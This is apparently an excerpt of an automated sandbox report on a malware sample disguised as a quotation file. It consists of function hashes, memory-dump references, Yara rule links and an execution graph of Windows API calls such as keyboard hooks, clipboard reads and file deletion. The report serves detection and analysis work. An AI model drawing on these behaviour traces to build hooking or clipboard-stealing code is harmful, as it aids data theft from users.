                                        • Snapshot File: hcaresult_0_2_84d000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8252da2f484a76daae48a7160d9001b9d71a9f119f2f9bf1e6eb40b0f01d19b4
                                        • Instruction ID: e7afa15f00061d39754607dba208703644beb2906aac868264a6eaf1a1a6f3af
                                        • Opcode Fuzzy Hash: 8252da2f484a76daae48a7160d9001b9d71a9f119f2f9bf1e6eb40b0f01d19b4
                                        • Instruction Fuzzy Hash: 13F062724043449AE7118B16DDC4B66FFE8EB91734F18C55AED484E296C2799C44CA71

                                        Non-executed Functions

                                        Function 06CC0E70 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7b39122f97403eedc98123dfda390bf13fbe2c0f5a4d2605e49c58640ed9a17
                                        • Instruction ID: e787b64193bbb0e5b89ae1fd9a4a9119c69afa6d05c2561e23a97fdc35d0339c
                                        • Opcode Fuzzy Hash: e7b39122f97403eedc98123dfda390bf13fbe2c0f5a4d2605e49c58640ed9a17
                                        • Instruction Fuzzy Hash: 52E11A74E002598FCB14DFA9D5809AEFBB2FF89314F248159E814AB35AD731AD81CF60
                                        Function 06CC0A38 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1737607240.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6cc0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58b434000911a2a0bb99cf2159aa510f8dfc1cf00476fc758d39708fd45b96d8
                                        • Instruction ID: a9e67644f3fce0f5d8ad6f677de3efb3532ceca9410481a94823b447801920a3
                                        • Opcode Fuzzy Hash: 58b434000911a2a0bb99cf2159aa510f8dfc1cf00476fc758d39708fd45b96d8
                                        • Instruction Fuzzy Hash: 3FE10974E00219CFCB14DFA9D5809AEFBB2BF88314F249159D814AB35AD731AD81CFA1
                                        Function 04BBE7D8 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f88f7ab9f27395ea0a4b4faf4f0a7278f5af05275949997b613184a1b9ef8d6
                                        • Instruction ID: 38b6c94ac40fe68b8a2e263af79eca036fab5ec42a2de312ac09c30bd41d742b
                                        • Opcode Fuzzy Hash: 3f88f7ab9f27395ea0a4b4faf4f0a7278f5af05275949997b613184a1b9ef8d6
                                        • Instruction Fuzzy Hash: 5BE1FA74E002198FCB14DFA9D5809AEFBB2FF89304F249199D855AB35AD770AD41CFA0
                                        Function 04BBE3A0 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 798a61e16659e3e815a92e954a7411cd1fac452643e9aeda161d00a210b8dc65
                                        • Instruction ID: 3af29ebb1d517dd859e977d0ad98ae19b5e423ca3d03d3d071d747c34681577e
                                        • Opcode Fuzzy Hash: 798a61e16659e3e815a92e954a7411cd1fac452643e9aeda161d00a210b8dc65
                                        • Instruction Fuzzy Hash: B2E10A74E002198FDB14DFA9D5809EEBBB2FF89304F2491A9D854AB359D770AD41CFA0
                                        Function 04BBEC10 Relevance: .3, Instructions: 312COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b892bc6c252af4bfc989fdc9f770d906c3235f510a16c14e08e966b4db9a762
                                        • Instruction ID: d3a1ecb044742c67b7ffa94c5b23c1fa982b3bf533f9746fba43b96eef4326e7
                                        • Opcode Fuzzy Hash: 4b892bc6c252af4bfc989fdc9f770d906c3235f510a16c14e08e966b4db9a762
                                        • Instruction Fuzzy Hash: 08E11A74E002198FCB14DFA9D5809AEFBB2FF88304F249199E854AB359D770AD41CFA0
                                        Function 04BB5E18 Relevance: .3, Instructions: 282COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 673135ac64682a1e450b86a4a7e79a1745d771f3938fb6b8429b985cfbc0b688
                                        • Instruction ID: 79bb983add7340559d54e736ce45da5eccabd7dc2a265bc56b4a5ca790f7cfe0
                                        • Opcode Fuzzy Hash: 673135ac64682a1e450b86a4a7e79a1745d771f3938fb6b8429b985cfbc0b688
                                        • Instruction Fuzzy Hash: EBE11731D10A1ACADB10EB64D954A9DF7B1FF95300F108B9AE5093B225FB70AAC5CF91
                                        Function 008AF2E4 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1730545540.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_8a0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e90b7e1125c9bf9808451dd9b0c1283c05902c7b6451f5ece75aaa52d1ab982a
                                        • Instruction ID: 39b197d15ea120dde495f732d7d10f278c94afac7c824e574b0eb14997825ea2
                                        • Opcode Fuzzy Hash: e90b7e1125c9bf9808451dd9b0c1283c05902c7b6451f5ece75aaa52d1ab982a
                                        • Instruction Fuzzy Hash: D4A16E32E002198FDF05DFB5C84059EBBB2FF86310B15857AE906EB226DB71E956CB50
                                        Function 04BB5E28 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e077ce77f14e4dde1d34781372c2a91e45247b3db61d4a06f26e628112ca7d3c
                                        • Instruction ID: 5ee195121bcdf0f87ca723096e58e9f1721fcf6328fa7929dff7535069f59735
                                        • Opcode Fuzzy Hash: e077ce77f14e4dde1d34781372c2a91e45247b3db61d4a06f26e628112ca7d3c
                                        • Instruction Fuzzy Hash: 41D11531D10B1ACADB10EB64D954A9DB3B1FF95300F509B9AE5093B225FB70AAC4CF91
                                        Function 04BBE7CB Relevance: .1, Instructions: 132COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ecbd76859b3333ee3948f760b7015d31df874aa0701ea9971fe32e349d29f9e
                                        • Instruction ID: 5fc3bf3482922aad929a427fca1e7fa6831bd61e42f007725570bb505fdec8d8
                                        • Opcode Fuzzy Hash: 0ecbd76859b3333ee3948f760b7015d31df874aa0701ea9971fe32e349d29f9e
                                        • Instruction Fuzzy Hash: A951FB70E002198FCB14CFA9D5805EEBBF2EF89304F24C1A9D458AB216D771A941CFA1
                                        Function 04BBE39B Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1735067470.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4bb0000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b23f49e7dbb11869a7c13cd387caeca01a92cb7357d8e98ec62082e8e1bc3c8
                                        • Instruction ID: e3c2c2a7a0521700072031fa5cc7a9ac658a208ac9bd99b92659a6e8e19fc090
                                        • Opcode Fuzzy Hash: 8b23f49e7dbb11869a7c13cd387caeca01a92cb7357d8e98ec62082e8e1bc3c8
                                        • Instruction Fuzzy Hash: 9951E674E002198FDB14DFA9D5805EEBBF2BF89304F24C1A9D458A7316D771A942CFA0

                                        Execution Graph

                                        Execution Coverage:13.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:1.2%
                                        Total number of Nodes:253
                                        Total number of Limit Nodes:30
                                        execution_graph 46363 e3d030 46364 e3d048 46363->46364 46365 e3d0a2 46364->46365 46373 692aab1 46364->46373 46382 6926190 46364->46382 46388 6926183 46364->46388 46394 69262bd 46364->46394 46398 692399c 46364->46398 46406 692398c 46364->46406 46410 692397f 46364->46410 46377 692aaba 46373->46377 46374 692aac0 46374->46365 46375 692ab41 46379 692ab3f 46375->46379 46426 6929ab4 46375->46426 46377->46374 46377->46375 46378 692ab31 46377->46378 46414 692ac58 46378->46414 46420 692ac68 46378->46420 46383 69261b6 46382->46383 46384 692398c GetModuleHandleW 46383->46384 46385 69261c2 46384->46385 46386 692399c 2 API calls 46385->46386 46387 69261d7 46386->46387 46387->46365 46389 69261b6 46388->46389 46390 692398c GetModuleHandleW 46389->46390 46391 69261c2 46390->46391 46392 692399c 2 API calls 46391->46392 46393 69261d7 46392->46393 46393->46365 46395 69262c0 46394->46395 46489 69239c4 46395->46489 46397 69262c7 46397->46365 46399 69239a7 46398->46399 46400 692ab41 46399->46400 46403 692ab31 46399->46403 46401 692ab3f 46400->46401 46402 6929ab4 2 API calls 46400->46402 46402->46401 46404 692ac58 2 API calls 46403->46404 46405 692ac68 2 API calls 46403->46405 46404->46401 46405->46401 46407 6923997 46406->46407 46408 69239c4 GetModuleHandleW 46407->46408 46409 69262c7 46408->46409 46409->46365 46411 6923991 46410->46411 46412 69239c4 GetModuleHandleW 46411->46412 46413 69262c7 46412->46413 46413->46365 46416 692ac68 46414->46416 46415 6929ab4 2 API calls 46415->46416 46416->46415 46417 692ad4e 46416->46417 46433 692b130 46416->46433 46438 692b140 46416->46438 46417->46379 46422 692ac6d 46420->46422 46421 6929ab4 2 API calls 46421->46422 46422->46421 46423 692ad4e 46422->46423 46424 692b130 OleGetClipboard 46422->46424 46425 692b140 OleGetClipboard 46422->46425 46423->46379 46424->46422 46425->46422 46427 6929abf 46426->46427 46428 692ae54 46427->46428 46429 692adaa 46427->46429 46430 692399c OleGetClipboard 46428->46430 46431 692ae02 CallWindowProcW 46429->46431 46432 692adb1 46429->46432 46430->46432 46431->46432 46432->46379 46434 692b136 46433->46434 46435 692b126 46434->46435 46443 692b6e7 46434->46443 46449 692b6f8 46434->46449 46435->46416 46439 692b15f 46438->46439 46440 692b1b6 46439->46440 46441 692b6e7 OleGetClipboard 46439->46441 46442 692b6f8 OleGetClipboard 46439->46442 46440->46416 46441->46439 46442->46439 46444 692b6f2 46443->46444 46446 692b63d 46444->46446 46455 692b731 46444->46455 46466 692b740 46444->46466 46445 692b729 46445->46434 46446->46434 46451 692b700 46449->46451 46450 692b714 46450->46434 46451->46450 46453 692b740 OleGetClipboard 46451->46453 46454 692b731 OleGetClipboard 46451->46454 46452 692b729 46452->46434 46453->46452 46454->46452 46456 692b73a 46455->46456 46457 692b76d 46456->46457 46459 692b7b1 46456->46459 46462 692b740 OleGetClipboard 46457->46462 46463 692b731 OleGetClipboard 46457->46463 46458 692b773 46458->46445 46461 692b831 46459->46461 46477 692ba08 46459->46477 46481 692b9f8 46459->46481 46460 692b84f 46460->46445 46461->46445 46462->46458 46463->46458 46467 692b752 46466->46467 46468 692b76d 46467->46468 46470 692b7b1 46467->46470 46473 692b740 OleGetClipboard 46468->46473 46474 692b731 OleGetClipboard 46468->46474 46469 692b773 46469->46445 46472 692b831 46470->46472 46475 692ba08 OleGetClipboard 46470->46475 46476 692b9f8 OleGetClipboard 46470->46476 46471 692b84f 46471->46445 46472->46445 46473->46469 46474->46469 46475->46471 46476->46471 46479 692ba1d 46477->46479 46480 692ba43 46479->46480 46485 692b4d0 46479->46485 46480->46460 46483 692ba1d 46481->46483 46482 692b4d0 OleGetClipboard 46482->46483 46483->46482 46484 692ba43 46483->46484 46484->46460 46486 692bab0 OleGetClipboard 46485->46486 46488 692bb4a 46486->46488 46490 69239cf 46489->46490 46495 6923854 46490->46495 46492 6926329 46494 6926397 46492->46494 46499 6923864 46492->46499 46496 692385f 46495->46496 46497 69249eb 46496->46497 46503 6924c0c 46496->46503 46497->46492 46500 6924f30 GetModuleHandleW 46499->46500 46502 6924fa5 46500->46502 46502->46494 46504 6923864 GetModuleHandleW 46503->46504 46505 6924c29 46504->46505 46506 6923864 GetModuleHandleW 46505->46506 46511 6924df4 46505->46511 46507 6924d7a 46506->46507 46508 6923864 GetModuleHandleW 46507->46508 46507->46511 46509 6924dc8 46508->46509 46510 6923864 GetModuleHandleW 46509->46510 46509->46511 46510->46511 46511->46497 46512 2a68040 46513 2a68086 DeleteFileW 46512->46513 46515 2a680bf 46513->46515 46651 6924f2b 46652 6924f72 46651->46652 46653 6924f78 GetModuleHandleW 46651->46653 46652->46653 46654 6924fa5 46653->46654 46350 6929ed8 DuplicateHandle 46351 6929f6e 46350->46351 46352 6925fd8 46353 6926010 CreateWindowExW 46352->46353 46355 69260fc 46353->46355 46356 692b918 46357 692b923 46356->46357 46359 692b933 46357->46359 46360 692b3b8 46357->46360 46361 692b968 OleInitialize 46360->46361 46362 692b9cc 46361->46362 46362->46359 46516 2a60848 46518 2a6084e 46516->46518 46517 2a6091b 46518->46517 46521 2a61340 46518->46521 46531 2a61458 46518->46531 46522 2a612ed 46521->46522 46524 2a61343 46521->46524 46522->46518 46523 2a61454 46523->46518 46524->46523 46528 2a61458 7 API calls 46524->46528 46541 692d388 46524->46541 46547 692d379 46524->46547 46553 2a68219 46524->46553 46558 6923318 46524->46558 46564 6923348 46524->46564 46528->46524 46533 2a61356 46531->46533 46534 2a6145f 46531->46534 46532 2a61454 46532->46518 46533->46532 46535 692d388 SetWindowsHookExA 46533->46535 46536 692d379 SetWindowsHookExA 46533->46536 46537 6923318 2 API calls 46533->46537 46538 6923348 2 API calls 46533->46538 46539 2a61458 7 API calls 46533->46539 46540 2a68219 4 API calls 46533->46540 46534->46518 46535->46533 46536->46533 46537->46533 46538->46533 46539->46533 46540->46533 46542 692d390 46541->46542 46543 692d3d5 46542->46543 46570 692d46a 46542->46570 46574 692d3e8 46542->46574 46578 692d3d8 46542->46578 46543->46524 46548 692d390 46547->46548 46549 692d3d5 46548->46549 46550 692d46a SetWindowsHookExA 46548->46550 46551 692d3d8 SetWindowsHookExA 46548->46551 46552 692d3e8 SetWindowsHookExA 46548->46552 46549->46524 46550->46548 46551->46548 46552->46548 46554 2a68223 46553->46554 46555 2a682d9 46554->46555 46586 693fa80 46554->46586 46591 693fa70 46554->46591 46555->46524 46559 692331d 46558->46559 46562 69232e3 46559->46562 46596 6923084 46559->46596 46561 69233d1 46601 69230a4 46561->46601 46562->46524 46566 692335a 46564->46566 46565 692340b 46565->46524 46566->46565 46567 6923084 GetModuleHandleW 46566->46567 46568 69233d1 46567->46568 46569 69230a4 KiUserCallbackDispatcher 46568->46569 46569->46565 46571 692d425 46570->46571 46573 692d468 46571->46573 46582 692c628 46571->46582 46573->46542 46576 692d405 46574->46576 46575 692d468 46575->46542 46576->46575 46577 692c628 SetWindowsHookExA 46576->46577 46577->46576 46580 692d405 46578->46580 46579 692d468 46579->46542 46580->46579 46581 692c628 SetWindowsHookExA 46580->46581 46581->46580 46583 692d5f0 SetWindowsHookExA 46582->46583 46585 692d67a 46583->46585 46585->46571 46587 693fa95 46586->46587 46588 693fca6 46587->46588 46589 693fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 46587->46589 46590 693fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 46587->46590 46588->46555 46589->46587 46590->46587 46592 693fa80 46591->46592 46593 693fca6 46592->46593 46594 693fcc1 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 46592->46594 46595 693fcd0 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 46592->46595 46593->46555 46594->46592 46595->46592 46597 692308f 46596->46597 46605 6924500 46597->46605 46617 69244eb 46597->46617 46598 69235aa 46598->46561 46602 69230af 46601->46602 46604 692b08b 46602->46604 46647 6929b0c 46602->46647 46604->46562 46606 6924505 46605->46606 46607 6923854 GetModuleHandleW 46606->46607 46608 6924592 46607->46608 46616 6923854 GetModuleHandleW 46608->46616 46629 6924a50 46608->46629 46634 69249d1 46608->46634 46638 6924981 46608->46638 46643 6924a80 46608->46643 46609 69245ae 46610 6923864 GetModuleHandleW 46609->46610 46611 69245da 46609->46611 46610->46611 46616->46609 46618 6924500 46617->46618 46619 6923854 GetModuleHandleW 46618->46619 46620 6924592 46619->46620 46624 6924a80 GetModuleHandleW 46620->46624 46625 6924a50 GetModuleHandleW 46620->46625 46626 6924981 GetModuleHandleW 46620->46626 46627 69249d1 GetModuleHandleW 46620->46627 46628 6923854 GetModuleHandleW 46620->46628 46621 69245ae 46622 6923864 GetModuleHandleW 46621->46622 46623 69245da 46621->46623 46622->46623 46624->46621 46625->46621 46626->46621 46627->46621 46628->46621 46630 6924a60 46629->46630 46631 6924a65 46629->46631 46630->46609 46632 6924b2e 46631->46632 46633 6924c0c GetModuleHandleW 46631->46633 46633->46632 46635 69249e0 46634->46635 46636 69249eb 46635->46636 46637 6924c0c GetModuleHandleW 46635->46637 46636->46609 46637->46636 46639 6924995 46638->46639 46640 69249fa 46638->46640 46639->46609 46641 6924a40 46640->46641 46642 6924c0c GetModuleHandleW 46640->46642 46641->46609 46642->46641 46644 6924aad 46643->46644 46645 6924b2e 46644->46645 46646 6924c0c GetModuleHandleW 46644->46646 46646->46645 46648 692b0a0 KiUserCallbackDispatcher 46647->46648 46650 692b10e 46648->46650 46650->46602

                                        Executed Functions

                                        Function 06932758 Relevance: 9.0, Strings: 6, Instructions: 1532COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 0db30bfc0630a9be8cc5854d45415a372f540ee5f2da54ca9db79247b018177d
                                        • Instruction ID: 82e39d0d50deccdd19fc4eadb8c217dbe1a45d441878c0261b18a01b99bd8313
                                        • Opcode Fuzzy Hash: 0db30bfc0630a9be8cc5854d45415a372f540ee5f2da54ca9db79247b018177d
                                        • Instruction Fuzzy Hash: 3DE24634E102198FDB64DF68C584A9DB7F6FF89300F6485A9D409AB665EB30ED85CF80
                                        Function 0693B348 Relevance: 8.3, Strings: 6, Instructions: 769COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                        • API String ID: 0-2392861976
                                        • Opcode ID: 9488e9b67408ac5c7bd7e17b263d7022de219f6efe2fe168520f85791710e348
                                        • Instruction ID: 5a66be777bab866d43d4a0abf6ac730b1a6dbb1d9e00fc3dc8c3d30132d8a244
                                        • Opcode Fuzzy Hash: 9488e9b67408ac5c7bd7e17b263d7022de219f6efe2fe168520f85791710e348
                                        • Instruction Fuzzy Hash: 27528130E101298FDF64CB68D5947ADB7F6EB95310F20882AE405EBB59DB34DC85CB51
                                        Function 06937E90 Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2014 6937e90-6937eae 2015 6937eb0-6937eb3 2014->2015 2016 6937eb5-6937ecf 2015->2016 2017 6937ed4-6937ed7 2015->2017 2016->2017 2018 6937ed9-6937ee7 2017->2018 2019 6937eee-6937ef1 2017->2019 2029 6937f36-6937f4c 2018->2029 2030 6937ee9 2018->2030 2021 6937ef3-6937f0f 2019->2021 2022 6937f14-6937f17 2019->2022 2021->2022 2023 6937f24-6937f26 2022->2023 2024 6937f19-6937f23 2022->2024 2026 6937f28 2023->2026 2027 6937f2d-6937f30 2023->2027 2026->2027 2027->2015 2027->2029 2034 6937f52-6937f5b 2029->2034 2035 6938167-6938171 2029->2035 2030->2019 2036 6938172-69381a7 2034->2036 2037 6937f61-6937f7e 2034->2037 2040 69381a9-69381ac 2036->2040 2046 6938154-6938161 2037->2046 2047 6937f84-6937fac 2037->2047 2041 69381b2-69381c1 2040->2041 2042 69383e1-69383e4 2040->2042 2051 69381c3-69381de 2041->2051 2052 69381e0-6938224 2041->2052 2044 6938407-693840a 2042->2044 2045 69383e6-6938402 2042->2045 2049 6938410-693841c 2044->2049 2050 69384b5-69384b7 2044->2050 2045->2044 2046->2034 2046->2035 2047->2046 2067 6937fb2-6937fbb 2047->2067 2057 6938427-6938429 2049->2057 2054 69384b9 2050->2054 2055 69384be-69384c1 2050->2055 2051->2052 2070 69383b5-69383cb 2052->2070 2071 693822a-693823b 2052->2071 2054->2055 2055->2040 2058 69384c7-69384d0 2055->2058 2059 6938441-6938445 2057->2059 2060 693842b-6938431 2057->2060 2068 6938453 2059->2068 2069 6938447-6938451 2059->2069 2065 6938433 2060->2065 2066 6938435-6938437 2060->2066 2065->2059 2066->2059 2067->2036 2073 6937fc1-6937fdd 2067->2073 2072 6938458-693845a 2068->2072 2069->2072 2070->2042 2081 6938241-693825e 2071->2081 2082 69383a0-69383af 2071->2082 2076 693846b-69384a4 2072->2076 2077 693845c-693845f 2072->2077 2084 6937fe3-693800d 2073->2084 2085 6938142-693814e 2073->2085 2076->2041 2097 69384aa-69384b4 2076->2097 2077->2058 2081->2082 2091 6938264-693835a call 69366b0 2081->2091 2082->2070 2082->2071 2098 6938013-693803b 2084->2098 2099 6938138-693813d 2084->2099 2085->2046 2085->2067 2147 6938368 2091->2147 2148 693835c-6938366 2091->2148 2098->2099 2105 6938041-693806f 2098->2105 2099->2085 2105->2099 2111 6938075-693807e 2105->2111 2111->2099 2113 6938084-69380b6 2111->2113 2120 69380c1-69380dd 2113->2120 2121 69380b8-69380bc 2113->2121 2120->2085 2123 69380df-6938136 call 69366b0 2120->2123 2121->2099 2122 69380be 2121->2122 2122->2120 2123->2085 2149 693836d-693836f 2147->2149 2148->2149 2149->2082 2150 6938371-6938376 2149->2150 2151 6938384 2150->2151 2152 6938378-6938382 2150->2152 2153 6938389-693838b 2151->2153 2152->2153 2153->2082 2154 693838d-6938399 2153->2154 2154->2082
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q$$^q
                                        • API String ID: 0-355816377
                                        • Opcode ID: 892dda508323309779f959033fd16e09001a841d0ce8b4678f443d64da6237a8
                                        • Instruction ID: ab23e77486e878326d686473a9d746b150642a43378ff0840826a5e6766934ed
                                        • Opcode Fuzzy Hash: 892dda508323309779f959033fd16e09001a841d0ce8b4678f443d64da6237a8
                                        • Instruction Fuzzy Hash: 9A02AE30B002158FDB54DBB5D9846AEB7E6FF84304F248529E41ADB794DB35EC86CB81
                                        Function 069356A8 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $
                                        • API String ID: 0-3993045852
                                        • Opcode ID: b056328883c66aa4647f1d74692f0d3394581e29e6ed75ccab2bd3a2a59c59cd
                                        • Instruction ID: ce7f05ec9d133d29e8eef91251a7b479b97205df53f1ff4584ad37c14eaf1514
                                        • Opcode Fuzzy Hash: b056328883c66aa4647f1d74692f0d3394581e29e6ed75ccab2bd3a2a59c59cd
                                        • Instruction Fuzzy Hash: 0122D131E002258FDF60DFA4C4846AEBBF6EF88314F21846AD45AEB754DA35DD42CB91
                                        Function 0692C628 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,00000000), ref: 0692D66B
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193699847.0000000006920000.00000040.00000800.00020000.00000000.sdmp, Offset: 06920000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6920000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID: HookWindows
                                        • String ID:
                                        • API String ID: 2559412058-0
                                        • Opcode ID: da2d435dbe4c0b215a9b802118618c73e8bdf741877d6c3dfc27e6ae1492d5ef
                                        • Instruction ID: 817869b7e9901c049a49007b67777e0a949e58d3011e8315d5caaaaf068c43f1
                                        • Opcode Fuzzy Hash: da2d435dbe4c0b215a9b802118618c73e8bdf741877d6c3dfc27e6ae1492d5ef
                                        • Instruction Fuzzy Hash: 502147B1D002199FCB54CF9AC884BEEFBF4EF88310F10842AE419A7250C774A944CFA5
                                        Function 06936700 Relevance: .8, Instructions: 809COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.4193884443.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_6930000_rQuotation3200025006.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 440f82d690fc5aa65e3d640d33da1e6a909264273be2b1ebe788fab6d809b792
                                        • Instruction ID: 1ca1b81f9542470f12b9096de618d8545cabdc2a18daa803cf2bb8dda4aa0799
                                        • Opcode Fuzzy Hash: 440f82d690fc5aa65e3d640d33da1e6a909264273be2b1ebe788fab6d809b792
                                        • Instruction Fuzzy Hash: 0062AF34A002149FDB54DFA8D994BAEB7F6EF88314F248469E406DB754DB35EC46CB80
                                        Function 0693ADE0 Relevance: 12.9, Strings: 10, Instructions: 389COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
